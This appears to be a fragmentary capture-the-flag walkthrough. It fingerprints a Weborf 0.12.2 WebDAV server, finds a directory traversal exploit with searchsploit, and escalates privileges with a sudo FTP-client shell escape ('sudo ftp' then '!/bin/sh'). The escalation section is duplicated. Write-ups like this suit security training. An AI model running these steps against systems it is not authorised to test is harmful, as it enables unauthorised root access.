

WebDAV

WebDAV (Web Distributed Authoring and Versioning) is a web-based technology which allows users to work collaboratively on documents



WebDAV

Name	
d	systemd-private-0497aaa0c0dc4b1d9588724
d	systemd-private-0497aaa0c0dc4b1d9588724
d	systemd-private-0497aaa0c0dc4b1d9588724
Generated by <u>Weborf/0.12.2</u> (GNU/Linux)	

This particular WebDAV software is called
Weborf version 0.12.2

WebDAV

```
(kali㉿kali)-[/tmp]
$ searchsploit Weborff 0.12.2
```

```
Exploit Title
```

```
weborff 0.12.2 - Directory Traversal
Weborff HTTP Server - Denial of Service
```

When we research this software version, we find there is a directory traversal exploit available, which gives us arbitrary file read access to the server

Privilege Escalation

Sudo Yafc

Yafc - Yet Another FTP Client

```
sudo ftp  
!/bin/sh
```

We have sudo access to the Yafc binary. When we research what this program is, it turns out it's a type of FTP client program

Privilege Escalation

Sudo Yafc

Yafc - Yet Another FTP Client

```
sudo ftp  
!/bin/sh
```

The privilege escalation method for the Yafc binary is the same as the Ftp binary, which is similar to the command above